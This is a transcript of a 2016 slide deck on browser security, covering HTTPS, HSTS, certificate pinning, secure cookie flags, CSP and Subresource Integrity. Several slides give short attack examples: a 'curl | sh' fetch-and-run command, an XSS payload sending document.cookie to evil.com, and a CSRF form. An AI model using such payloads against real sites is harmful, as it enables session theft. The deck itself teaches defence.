Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Platform Security

Jérémy Courtial
October 26, 2016
Programming
0
44

Web Platform Security

Jérémy Courtial

October 26, 2016
Tweet

More Decks by Jérémy Courtial

See All by Jérémy Courtial
sudo give the cloud
mrartichaut
0
24
An introduction to AppSec?
mrartichaut
0
42
Secure by design: introduction to threat modeling
mrartichaut
0
47
Taming secrets with Vault
mrartichaut
0
80
Lead Tech: Empowering the team
mrartichaut
0
45
go doSomeThing()
mrartichaut
0
49
Practical Cryptography : Data Encryption
mrartichaut
0
58
Practical Cryptography : Password Hashing
mrartichaut
1
68
HTTP/2 : One connection to rule them all
mrartichaut
1
57

Other Decks in Programming

See All in Programming
距離関数を極める! / SESSIONS 2024
gam0022
0
120
Googleのテストサイズを活用したテスト環境の構築
toms74209200
0
310
Macとオーディオ再生 2024/11/02
yusukeito
0
350
GitHub Actionsのキャッシュと手を挙げることの大切さとそれに必要なこと
satoshi256kbyte
5
420
タクシーアプリ『GO』のリアルタイムデータ分析基盤における機械学習サービスの活用
mot_techtalk
4
760
TypeScript Graph でコードレビューの心理的障壁を乗り越える
ysk8hori
1
220
型付き API リクエストを実現するいくつかの手法とその選択 / Typed API Request
euxn23
5
1.5k
Java ジェネリクス入門 2024
nagise
0
700
レガシーシステムにどう立ち向かうか 複雑さと理想と現実/vs-legacy
suzukihoge
14
2.1k
Boost Performance and Developer Productivity with Jakarta EE 11
ivargrimstad
0
1.7k
Pinia Colada が実現するスマートな非同期処理
naokihaba
4
220
見せてあげますよ、「本物のLaravel批判」ってやつを。
77web
7
7.4k

Featured

See All Featured
A Tale of Four Properties
chriscoyier
156
23k
KATA
mclloyd
29
14k
5 minutes of I Can Smell Your CMS
philhawksworth
202
19k
We Have a Design System, Now What?
morganepeng
50
7.2k
Learning to Love Humans: Emotional Interface Design
aarron
273
40k
The Art of Programming - Codeland 2020
erikaheidi
52
13k
Fashionably flexible responsive web design (full day workshop)
malarkey
405
65k
Designing on Purpose - Digital PM Summit 2013
jponch
115
7k
For a Future-Friendly Web
brad_frost
175
9.4k
Principles of Awesome APIs and How to Build Them.
keavy
126
17k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
38
1.8k
jQuery: Nuts, Bolts and Bling
dougneiner
61
7.5k

Transcript

  1. Web Platform Security Leveling up Jérémy Courtial Software Security Architect

  2. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin.

  3. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin. Rootkit ?

  4. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin. Malware ?

  5. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin. Trojan ?

  6. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin. Browser /ˈbraʊ.zɚ/

  7. http://yolo.com Go!

  8. curl -s http://yolo.com | sh VS http://yolo.com Go!

  9. Browser : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from unknown origin.

  10. Unknown origin

  11. Unknown origin Unsecure

  12. What is anyway ? www.google.com

  13. What is anyway ? www.oodrive.com

  14. What is anyway ? www.lol-cats.com

  15. What is anyway ? 172.217.20.46

  16. Unsecure origin

  17. Unsecure origin

  18. Transport Layer Security

  19. Confidentiality Integrity Authentication

  20. Other incentives "The green lock™"

  21. Other incentives HTTP/2

  22. Other incentives "Secure origins only" features

  23. http https

  24. GET /

  25. GET / 302 Found Location: https://yolo.com

  26. GET / 302 Found Location: https://yolo.com

  27. None
  28. None

  29. 302 Found

  30. 302 Found

  31. 302 Found

  32. HTTP Strict Transport Security

  33. Strict-Transport-Security :

  34. max-age=31536000; Strict-Transport-Security :

  35. includeSubdomains; max-age=31536000; Strict-Transport-Security :

  36. http://yolo.com

  37. http://yolo.com 307 Internal Redirect

  38. https://yolo.com 307 Internal Redirect

  39. 307 Internal Redirect GET / https://yolo.com

  40. Trust failure

  41. TLS certificates are based on trust

  42. Oh… trust … That's cute …

  43. Trust-based systems don't have a good reliability record …

  44. Certificate Authority failures Bad captive portal Every "Internal CA"

  45. You've failed me for the last time

  46. HTTP Certificate Pinning

  47. Public-Key-Pins:

  48. Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM=";

  49. Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g=";

  50. Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";

  51. max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";

  52. includeSubDomains; max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";

  53. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from unknown origin.

  54. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from secured origins.

  55. Unknown code

  56. XSS <h1>Hello, ${username}</h1>

  57. XSS $username = "<img src=evil.com?cookies=" + document.cookie + "/>"

  58. XSS <h1>Hello, <img src="evil.com?cookies =JSESSIONID=5FZ4DS…" /> </h1>

  59. CSRF https://evil.com Click here!

  60. CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post

    <input value="I ❤ Justin Bieber" name="message" type="hidden">

  61. CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post

    <input value="I ❤ Justin Bieber" name="message" type="hidden">

  62. CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post

    <input value="I ❤ Justin Bieber" name="message" type="hidden">

  63. Everybody love cookies !

  64. Rename Cookie to Spinach ?

  65. Rename Cookie to Spinach ? Brussel Sprout ?

  66. REJECTED

  67. Locking the cookie jar

  68. Set-Cookie : JSESSIONID=12345;

  69. Set-Cookie : JSESSIONID=12345; secure;

  70. Set-Cookie : JSESSIONID=12345; secure; HttpOnly;

  71. Set-Cookie : JSESSIONID=12345; sameSite = strict | lax; secure; HttpOnly;

  72. Content Security Policy

  73. Content-Security-Policy

  74. : default-src 'none'; script-src 'self' 'api.google.com'; style-src … ; form-src

    … ; connect-src …; Content-Security-Policy

  75. : … report-uri …; script-src 'strict-dynamic' …; upgrade-insecure-requests; … Content-Security-Policy

  76. Our data (cookies, assets) are locked. What about third parties

    ?

  77. HTML JS JPG

  78. CDN HTML JS JPG JS JPG

  79. CDN HTML JS JPG JS JPG

  80. CDN HTML JS JPG JS JPG

  81. CDN HTML JS JPG JS JPG

  82. Subresource Integrity

  83. <script src="https://example.com/framework.js" > </script>

  84. <script src="https://example.com/framework.js" </script> integrity="sha384-oqVuAfXR….Y8wC">

  85. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from secured origins Browser unknown code

  86. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from secured origins Browser trusted code

  87. Many more Suborigins iframe sandboxing Credentials Management

  88. https://www.w3.org/2011/webappsec/ @mikewest

  89. Times have changed

  90. Times have changed "secured" is the new default secured

  91. What does secured means ? secured Least Privilege Authentication Integrity

  92. Is our platform ? secured

  93. Thank you Icons from Ismael Ruiz, Konstantin Velichko, Rémy Médard,

    unlimicon (The Noun Project) and design.google.com/icons/